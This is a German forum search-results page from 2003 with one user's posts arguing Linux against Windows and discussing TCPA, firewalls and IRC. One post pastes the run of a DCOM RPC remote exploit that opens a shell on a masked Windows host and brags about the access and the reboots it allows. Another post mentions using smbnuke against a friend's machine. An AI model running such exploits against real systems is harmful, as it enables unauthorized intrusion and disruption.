the Hellboard
Zum Portal Registrierung Kalender Mitgliederliste Teammitglieder Suche Häufig gestellte Fragen Zur Startseite

the Hellboard » Suche » Suchergebnis » Hallo Gast [Anmelden|Registrieren]
Zeige Beiträge 1 bis 25 von 195 Treffern Seiten (8): [1] 2 3 4 5 nächste » ... letzte »
Autor Beitrag
Thema: Linux Tools
Mix2k

Antworten: 14
Hits: 16.325
07.09.2003 00:31 Forum: Software


samba is opensource und sollte kein problem sein das zum laufen zu bekommen (google: swat)
wenn du wineX haben willst kannste mich ja mal ansprechen (im irc) dann geb ich dir ne url, cvs... ich weiss garnicht ob die das machen.. ich glaub weniger und wenn würde ich sowas nicht nehmen.. weil das winex lässt sich da selten kompilieren....
Thema: Wie werde ich ein echter Linuxer....
Mix2k

Antworten: 23
Hits: 25.311
03.09.2003 19:54 Forum: Software


warum liest du dann den thread? und es entspricht bestimmt nicht der realität Zunge raus

btw: du hast eier? aber die sind doch bestimmt schon am kammeln oder?
Thema: Wie werde ich ein echter Linuxer....
Mix2k

Antworten: 23
Hits: 25.311
03.09.2003 19:43 Forum: Software


stress? nö wo denn? wer hat denn angefangen mit stress? und sterben tu ich später mal smile . und n00bs seit ihr doch... warum hat mich dann ultra grfragt wegen der reboot sache und ich ihn dann auch geholfen hab Augenzwinkern und 3of666 mit seiner dummen behauptung "..smbnuke..." *totlach* was soll man dann von so einem haufen scheise denken? ich hab den screen schon mal en paarn gezeigt *g* die haben sich auch über euch lustig gemacht was ihr für sprallos seit *g*
Thema: Wie werde ich ein echter Linuxer....
Mix2k

Antworten: 23
Hits: 25.311
03.09.2003 18:13 Forum: Software


Zitat:
Original von MoD3000
ich kenn keinen Linuxpro hier Zunge raus
Alle die hier Linux einsetzen, kennen vielleicht grad mal 10% davon...


ich könnte wetten das ein normaler linuxuser 0% von _linux_ kennt! überleg mal mod smile

Zitat:
-=[The Harlekin]=-
Das wollte ich auch grade unserem Pro schreiben

siehtste mal wieder.. ich brauch mich garnicht pro zu nennen.. ich werde es schon Augenzwinkern .
tja... aber alles nur neid weil ihr zu doof seit damit umzugehen Augenzwinkern was ihr für n00bs seit sieht man ja immerwieder:
Thema: Wie werde ich ein echter Linuxer....
Mix2k

Antworten: 23
Hits: 25.311
03.09.2003 16:01 Forum: Software


Zitat:
Original von Avalon
Wie werde ich ein echter Linuxer. Anleitung in 18 Punkten

eigentlich reichen 2! 1. er muss einfach nur linux nutzen und der 2. was dann einen richtigen ausmacht is das er M$ hassen muss Zunge raus

Zitat:
Original von Avalon
- Bezeichne dich als "Profi". In Steigerungsform "Computer-Profi" und
falls du besonders lame klingen willst "EDV-Profi".

is sinnlos... das wird man dann schon von alleine (seh ich gerade wieder in der schule Augenzwinkern nur weil man linux nutzt gilt das glei als hätte man plan von computern

Zitat:
Original von Avalon
- Lass dir einen Schnauzbart wachsen.

wozu? mein bart wird zwar ab und an schon mal länger aber nur weil ich zu faul bin und die zeit lieber mit meinem system verbringe Zunge raus

Zitat:
Original von Avalon
- Interessiere dich für Betriebssysteme, und entwickle tiefe
religiöse Gefühle wenn es darum geht welches Betriebssystem DU
benutzt. Betrachte dich als Kreuzritter in der epischen Schlacht
gegen das absolut Böse. Das Überleben der Menschheit steht auf dem
Spiel!

auf in den kampf! smile is aber wahr großes Grinsen

Zitat:
Original von Avalon
- Rede in jeder Situation von "kernel", "shell", "x-term" und "open
source", insbesondere auf Partys und in öffentlichen Verkehrsmitteln.
Das ermöglicht es dir zu beeindrucken und für einige Sekunden zu
brillieren, auch wenn sich der Mehrzahl deiner Zuhörer vor
Peinlichkeit die Fußnägel aufrollen.

und das solls bringen? ich mein... wenn man plan von hat bekommen das die anderen auch anders mit Zunge raus

Zitat:
Original von Avalon
- Schwöre auf kryptische und unbenutzbare Programme wie vi, emacs,
gnuplot, x-wix etc. Falls das jemand belächelt, sage diese Programme
seien "mächtig".

tja... sowas nenn ich nur neid der anderen das sie sowas nicht haben (wintendo-user) oder solche die es nicht bedienen können Augenzwinkern

Zitat:
Original von Avalon
- Habe starke Meinungen. Lautstarkes Geschwätz, anderen ungefragt ins
Gesicht geblasen, gibt dir Recht.

wenn man recht hat is das ja auch voll okay smile und wenn man von seiner sache überzeugt ist isses auch okay Augenzwinkern

Zitat:
Original von Avalon
- Benutze ausschließlich Shareware und Freeware, vornehmlich
Lebenswerke skandinavischer Gummizelleninsassen. Fiebere zusammen mit
einer großen Fangemeinde sehenssüchtig der neuesten Version entgegen
und krieche Software und Programmierer gleichermaßen in den Arsch.

nö, nur opensource! und warum kann man sich nicht freuen wenn eine neue version einer schon lange erwarteter software rauskommt? und ich hab noch nie mit einem programmierer von irgendeiner software geredet, also noch keine möglichkeit gehabt ihn in arsch zu griechen Augenzwinkern

Zitat:
Original von Avalon
- Glaube an das "Anti-Occams-Razor"-Prinzip: Von zwei Programmen die
den gleichen Zweck erfüllen ist immer jenes das 'bessere' welches
länger zu lernen, schwieriger zu installieren und unangenehmer zu
benutzen ist.

tja... das is halt so.. windows braucht nie lange für eine version.. und is dementsprächend auch scheisse!!!

Zitat:
Original von Avalon
- Verwende die Shell. Vertrete dogmatisch die Meinung, die Shell sei
jeder anderen Art einen Computer zu bedienen überlegen. Lerne jedes
hieroglyphische Kommando and versuche andere damit zu beeindrucken.
Auch in 50 Jahren werden Computer nur mit Befehlen wie "tar -xvf
bullshit" richtig zu bedienen sein.

mit der kann man auch am ende die meisten sachen machen... und ein linux user kommt auf kurz oder lang nicht an ihr vorei und wird auch irgendwann merken das sie einfach besser/schneller ist!

Zitat:
Original von Avalon
- Benutze Skriptsprachen. Alle Probleme für die Computer notwendig
sind werden am professionellsten durch aufgeblasene, langsame und
fehleranfällige Skriptschlachten gelöst.

sinnlos.. sieht aber evtl ganz l33t aus Augenzwinkern

Zitat:
Original von Avalon
- Lese Foren und Newsgroups und beteilige dich an Diskussionen über
Linux. Predige mit missionarischem Eifer für die Verkündung des
Linus, denn du bist erleuchtet. Gelobe geistige Armut, Gehorsam und
ewige Betriebssystemkeuschheit. Pilgere mindestens einmal in deinem
Leben zu einem Linux-Kongress.

neid! nur weil M$ keine messen machen und so smile und warum soll man nicht über linux reden... es is einfach gut.. und das kann man doch mal äussern Augenzwinkern

Zitat:
Original von Avalon
- Mache es dir zum Lebensinhalt, "fvwm" einzurichten, "Filesysteme zu
mounten" und "sendmail" zu konfigurieren. Dabei ist es von
untergeordneter Bedeutung, ob diese jemals benutzt werden. Behaupte
trotzdem standhaft vor Kollegen, dies alles sei "unverzichtbar".

sendmail muss nichtmal sein, exim is viel einfacher smile warum fvwm? sinnlose grafische oberflächen! pure console mit framebuffer rullt!

Zitat:
Original von Avalon
- Beglücke jeden in Emails und Forumsbeiträgen mit lustigen Zitaten
aus "Star Trek", "Herr der Ringe" sowie "Per Anhalter durch die
Galaxis". Gleichgesinnte werden sich freuen, dass auch DU geistig in
der Pubertät stecken geblieben bist.

o_O

Zitat:
Original von Avalon
- Baue in deinem Ein-Personen-Haushalt ein Linux-Netzwerk mit
mehreren Rechnern auf. Die Faszination, einen Computer durch einen
anderen fernzusteuern, entspricht der kindlichen Begeisterung einer
elektrischen Spielzeugeisenbahn und wird dir über viele einsame
Stunden hinweghelfen.

*g* netzwerke sind auch goil, kann man viel lernen und mit linux kann man halt auch mal schauen was "hinten" abläuft, was man bei windows nicht so kann Augenzwinkern

Zitat:
Original von Avalon
- Bereichere das Internet mit einer Lynx-kompatiblen Webseite, auf
der Bilder von dir selbst, deiner Exfrau und dem Linux-Maskottchen zu
finden sind. Sorge dafür, dass Verweise auf diese wichtigen
Informationen richtig in Internet-Suchmaschinen eingetragen sind.
Vergiss den Web-Counter nicht.

Bilder? ich muss doch bitten. und web-counter is kinderkacke. wenn die seite w3m kompatibel ist reicht das auch aus smile

Zitat:
Original von Avalon
- Gebe dich wissenschaftlich. Lasse bei anderen den Eindruck
entstehen, dass du Computer und Linux für komplizierte informatische
Probleme einsetzt. Nicht funktionierende Drucker und flimmernde
Bildschirme sind dabei lediglich ein "Konfigurationsproblem".

is nutz linux zum arbeiten, für was man halt einen rechner hat ( ja... ihr habt sie alle als z0ckmaschine smile ). und wenn der drucker nicht geht kann es nur an dem user liegen, linux (oder der computer) macht keine fehler!

Zitat:
Original von Avalon
- Bekämpfe jeden Versuch Computer zu vereinfachen und deren Bedienung
zu erleichtern. Denn wenn das eintritt, bist du sofort kein "Profi"
mehr.

durchdrehn durchdrehn durchdrehn

Zitat:
Original von Avalon
- Falls das alles nicht klappt, werde zum "Propheten des Untergangs".
Verbreite überall die depressive Philosophie "alles war früher
besser" oder "es herrscht kein Idealismus mehr, jeder strebt nur noch
nach Profit".

*blubb* das ChAoS kommt sowieso
Thema: Welche Messenger nehmt ihr so ?
Mix2k

Antworten: 14
Hits: 15.495
17.08.2003 21:27 Forum: Internet


für irc nehm ich irssi Augenzwinkern absolut goiles teil....

was mit üben in der umfrage fehlt is silc *g*
Thema: windows = scheisendreck ?
Mix2k

Antworten: 49
Hits: 44.216
17.08.2003 17:57 Forum: Software


-=[The Harlekin]=-: "Wurde durch Patch behoben, Mix. Ist das bei Linux nicht auch so?"

nein! nicht remote. local gab es beim 2.4.18 (und auch 2.2) ptrace wodurch mal local root bekommt, aber remote is das bei *linux* nicht möglich. weil linux keine tcp verbindungen aufmacht (linux is ja nur der kernel, mehr nicht!, es ist nicht so wie bei *bsd *g* *duck*)
windows hat ein packet da gehört alles rein und das nennt man windows...! ein linux system nennt man nicht umsonst meist gnu/linux Augenzwinkern

also komm mir hier mal nicht mit deinen scheiss halbwahrheiten!
Thema: windows = scheisendreck ?
Mix2k

Antworten: 49
Hits: 44.216
12.08.2003 13:48 Forum: Software


ich bin ja mal gespannt wann der erste (ich glaub sowas gabs noch net) exploit kommt der ein bug im windows kernel ausnutzt... weil da helfen euch eure firewalls auch nichtmehr *g* und so einer wird kommen *g* auch wenn er nur ein trojaner oder sowas is... *g* der einen socket im kernel auf macht *g*
Thema: windows = scheisendreck ?
Mix2k

Antworten: 49
Hits: 44.216
12.08.2003 13:10 Forum: Software


jaja... ich darf doch mal was posten.. hoffe hat niemand was dagegen: (sonst müssen es halt die admins löschen)

root@ttyp3[.exploits]# ./0x82-dcomrpc_usemgret -h XXXXXXXXXXXXXXXXXX
DCOM RPC WIN32 remote exploit (Most languages)
[*] Target: Windows 2000 magic version 1.
[0] Add return address.
[1] Start, shellcode setting.
[2] Trying XXXXXXXXXXXXXXXXX:135 ...
[3] Connected to XXXXXXXXXXXXXXXXXXXX:135.
[4] Send, attack code.
[5] OK, Trying XXXXXXXXXXXXXXXXXXXXX:4444 ...
[*] Waiting, cmd shell ...
[!] Executed shell successfully !
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>cd C:\

tata... ich hab vollen zugriff auf eine windose *g*
und das rebooten...

23:55 < XXXXX> ich meinte/wollte der für die reboots verantwortlich is
23:58 <@XXXX> Na wenn die shell offen ist dann noch den Aufruf auf user32.dll mit reboot-Option hinzubekommen sollte kein Akt sein, oder?

http://cert.uni-stuttgart.de/ticker/article.php?mid=1132 hier gibts nochmal ein paar infos *g*

ich wünsch euch noch viel spass mit euren dosen Augenzwinkern
Thema: windows = scheisendreck ?
Mix2k

Antworten: 49
Hits: 44.216
12.08.2003 12:21 Forum: Software


hmm... aber mal was anderes... soweit ich das glaube mal gelesen hab soll ja tcpa auch tcp-verbingungen *überwachen* also keine verbindung zu einem nicht-tcpa computer verbieten?! (koregiert mich wenn ich flasch liege) aber wie sieht das dann aus wenn ich zb einen 133er als router nehme der keine tcpa hw hat? bzw wie sieht es mit anderen non-x86 aus.. sparc, alpha.. mac.... apple hat sich ja voll distanziert von tcpa... wie das bei sun oder dec(?) aussieht weiss ich nicht...
Thema: windows = scheisendreck ?
Mix2k

Antworten: 49
Hits: 44.216
11.08.2003 22:04 Forum: Software


90%? wohl ehr umgedreht... stink normale user is das doch egal.. mein onkel als alter windows user hat noch nie was von tcpa gehört der würde es nichtmal merken wenn er welche hätte... das find ich auch irgendwo das schlimme an der sache.. normaler user wissen es nicht, die werden nicht aufgeklärt, user mit en bissel peilung wissen das aber normale user wissen es nicht und das is nunmal die mehrheit, aber wir weichen vom topic ab *g*
Thema: windows = scheisendreck ?
Mix2k

Antworten: 49
Hits: 44.216
11.08.2003 17:49 Forum: Software


das kann man so nicht sagen... viele firmen sind nur drin wegen der software pirateri (mp3, musik cds brennen.....)
Thema: windows = scheisendreck ?
Mix2k

Antworten: 49
Hits: 44.216
11.08.2003 16:58 Forum: Software


"- Es gibt ein Bug, dass die Registry innen Arsch gehen, wenn man " O_O *ein* es gibt ja wohl etliche bugs in einem windows...

und das mit tcpa... ey.. leute.. auch linux is davon betroffen und es ist noch lange nicht ausgetragen ob linux so in der form weiter auf x86 laufen kann/wird! und das mit dem "mein xp kann ich auch anpassen blablabla" LEUTE(!) wisst ihr überhaupt *was* es für wm's für X gibt?.... und es ist egal ob tcpa in der hw is oder nicht! ihr solltet euch mal en bissel im inet umsehen was man alles so machen kann... es kann einfach nicht lange leben, is so! soll mir einer sagen wie die das bombensicher machen wollen? M$ arbeitet da mit... also *g* *duck*.... ich will ja nurmal an die XBox sache errinnern... ein kleines bit im bios geändert scho konnte man alles druf laufen lassen... genauso wie psX mit ihren gebrannten cds.. da macht man en chip rein.. und gut is *g* sowas lässt sich allerdings bei einem ordrntlichen computer auf über software regeln...
Thema: windows = scheisendreck ?
Mix2k

Antworten: 49
Hits: 44.216
11.08.2003 14:06 Forum: Software


naja... da macht jeder seine eigenen erfahrungen.. aber wo ich 2wochen lang xp hatte.... also nein.. bei mir war 2k besser
Thema: windows = scheisendreck ?
Mix2k

Antworten: 49
Hits: 44.216
11.08.2003 13:59 Forum: Software


so.. will ich mich auch mal zu wort melden....

vieles wurde zwar schon gesagt aber egal...

fangen wir mal mit den vorteilen von windows an(da sind wir ehr fertig):
- es ist recht einfach... ein normaler anwender kommt gut mit klar (mein onkel arbeit schon seit 2-3jahren mit windows und wir mussten nur einmal neuinstallieren (win me zu winxp) obwohl das bei anderen usern die mehr am rechner machen nicht so hinkommt *g*
- die installation von xp/2k is recht einfach (me weiss ich jetzt nichtmehr, aber 98 is für normale user zuviel DOS)
-es sieht schon aus (anpassungsfähigkeit is ein anderes thema)
-hmm... ich hab die erfahrung gemacht das es als n00b stabieler rennt als ein linux, ich weiss nicht woran es liegt aber ein anfänger bekommt ein *NIX immer down *g* (mir geht es aber mittlerweile so mit windows weil ich diese instabilität nicht kenne)
- hmm... zZ fallen mir keine weiteren guten gründe zu win ein... aber das mag daran liegen weil ich es einfach nicht so gut kenne wir ihr...

kommen wir mal zum nachteilen *g*:
-bug: also da bekomm ich immer das kotzen.. wenn ich zb zZ lese das im rpc da en remote exploit gibt der einen ne shell gibt... das muss nu echt net sein...
-die geld frage...
-spyware.. oder wie das heisst.. kp kenn ich unter linux nicht..
-anpassungsfähigkeit... unter linux gibt es mehrere hundert window manager (also sowas wie der windows desktop) DA KANN MAN ALLES MACHEN, ihr könnt euch das nicht vorstellen(!) das is zu genial!!!!
-langsam... also das kenn ich auch noch.. erster start von win2k... "goil geht das schnell" (da hatte ich noch kein linux mit böse grafik) aber nach dem installieren von nvidia teil da..*lahm* und dann noch sp1 und sp2 (meh hab ich nicht erlebt) *5min... lalelu* ......
-naja dann is halt noch die sache mit opensource ...gpl...und die ganze sache... (wenn windows opensource wär würde ich evtl wieder weckseln weil man da viele schöne neue sachen unter windows entdekcen kann)
-naja... das mit dem reboot... das is halt so +g+

hmm.. tcpa will ich nicht unbedingt mit hierher machen weil das ja auf die hw geht ... und tcpa nur eine zeit lang sich halten *kann*, auch dauer wird es kein tcpa geben! die menschheit lässt sich nichtmehr zwingen!
es gibt genug hacker und cracker die das knacken werden!!! (obwohl ich mich als linux user auf die tcpa zeit freue *g*)

aber weil ich die vor/nachteile von windows genannt hab will ich die auch mal von *NIX systemen nennen *g*

nachteile (sind wir ehr fertig):
-am anfang (ich geh mal vom umstieg vom bösen zum guten) is es nicht leicht.. gibt viel zu tun und man muss es wollen.. sonst installiert man sich schnell wieder sein windows und spielt erstmal ne runde CS *g*
-... hmm mehr fallen mir jetzt echt nich ein *g* (aber ich bin offen für alles)

vorteile:
-schnell
-anpassungsfähig
-benutzerfreundlich
-selbsterklärend
-gute hilfe!!!
-zuverlässig
-opensource (nicht alle *NIX systeme aber die meisten die heute noch einen namen haben schon)
-programmiererplattform nr1! so gut wie alle compiler/interpreter sind frei erhältlich und meist schon bei der distri dabei (bei win kauft man sich sowas teuer (ide))
-es gibt für alles ein programm
-sicher
-klein
-wenn man was nicht braucht muss man es nicht installieren (man braucht kein ie.. aber man hat ihn immer)

das solls erstmal gewesen sein *g*


knolle:" dieses ganze tcpa würde nix bringen, wenn das betriebssystem dies nicht unterstützt... und windows wird da wohl das einzige os sein, dass dies unterstützt..."

oooo wenn das OS es nicht unterstützt bootet es nicht!
Thema: Freeware Firewall
Mix2k

Antworten: 12
Hits: 14.915
06.08.2003 22:21 Forum: Software


btw: dazu sollte man erstmal den angreifer kennen *g* nachdenken
Thema: Freeware Firewall
Mix2k

Antworten: 12
Hits: 14.915
06.08.2003 20:43 Forum: Software


lol mod du oller h4xXx0r
Thema: Freeware Firewall
Mix2k

Antworten: 12
Hits: 14.915
06.08.2003 12:32 Forum: Software


hmm... das mit deimem "speedproblemen" hast du mir doch schon erklärt.. dein downloadmanager sei zu schnell und da fliegst du oft ausm irc raus... sry.. ich kenn deinen pc nicht und hab auch kein plan was du da so machst aber *ich* mach da nix... tut mir leid...

dein edit das du nichtmehr in #hellboard kommst... also ich weiss nicht... du warst evtl 5minuten wech *g*

naja.. denk was *du* willst.. mir ladde..
Thema: Allgemeine IRC-Regeln
Mix2k

Antworten: 99
Hits: 79.775
06.08.2003 01:45 Forum: Feedback


lol.... das is kein spam thread...

pat: so kann man auch auf seine posts kommen *g*
Dummes Posting funny Post hanf dagegen SPAM WHY? OT escht? Schweinkram KEIN SPAM
Thema: Freeware Firewall
Mix2k

Antworten: 12
Hits: 14.915
05.08.2003 20:44 Forum: Software


hmm? ich weiss jetzt echt nicht worauf du anspielen willst.. *g*

mr. ich-bin-ja-so-toll .... na... soweit bin ich noch nicht *g*

btw: ich wollte dir wiedermal nur helfen und nett sein... und ..was tust du? wieder deine scheiss machen
Thema: Freeware Firewall
Mix2k

Antworten: 12
Hits: 14.915
05.08.2003 20:16 Forum: Software


hmm..
mal noch ne andere frage: warum willst du überhaupt eine?

knolle: kerio... da hab ich mal ne coole sache erlebt.. ich und en kumpel mach schon 1on1 lan... er hat diese firewall.. +win2k sp2 oder sogar schon 3.. kp... ich hab ihn mal gebenten seine firewall auszumachen.. um smbnuke.c zu testen *g*... ging nich.... er hat die firewall angemacht... und *blub* über port 443(?) (irgendsowas von M$) hat er dann erfolgreich genuked... dieser port war aber eigentlich gespert... aber auf diesem port war irgend so eine remote verwaltungsscheisse die nach aussen hin offen war *g*.. fragt mich nicht wie es dadurch nuken konnte.. er hat einen sauberen reboot hingelegt *g*
Thema: Freeware Firewall
Mix2k

Antworten: 12
Hits: 14.915
05.08.2003 20:05 Forum: Software


*g* jaja brain ich weiss schon warum...

aber wenn du ne firewall für windows suchst kann ich dir nur zonealarm empfehlen...
das is die einizgst beste die du als freeware für windows bekommst

http://downloads-zdnet.com.com/3120-20-0...larm&tg=dl-2001
Thema: Allgemeine IRC-Regeln
Mix2k

Antworten: 99
Hits: 79.775
05.08.2003 13:21 Forum: Feedback


Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand Kopf gegen Wand bekloppt? durchdrehn verblüfft
ey... das war doch echt sinnlos.. *g* aber naja.. da merkt man mal wieder das in dem chan der grossteil einfach nur beschränke kleine ******* ******** **** **** sind! (sry) *g*

[edit by Liquid] Also man muss ja nicht gleich beleidigend werden Augenzwinkern [/edit]
Thema: Allgemeine IRC-Regeln
Mix2k

Antworten: 99
Hits: 79.775
04.08.2003 16:52 Forum: Feedback


aber mit der meinung steht knolle nicht alleine smile
Thema: Allgemeine IRC-Regeln
Mix2k

Antworten: 99
Hits: 79.775
03.08.2003 19:09 Forum: Feedback


von den nerven mal abgesehen... überlegt doch mal... warum hat man kicks erfunden wenn man autorejoin hat? oft merkt man doch garnicht das man gekickt wurde! durchdrehn besserwisser rolleyes Kopf gegen Wand
Zeige Beiträge 1 bis 25 von 195 Treffern Seiten (8): [1] 2 3 4 5 nächste » ... letzte »

Impressum Netiquette

Powered by Burning Board 2.3.6 © 2001-2007 WoltLab GmbH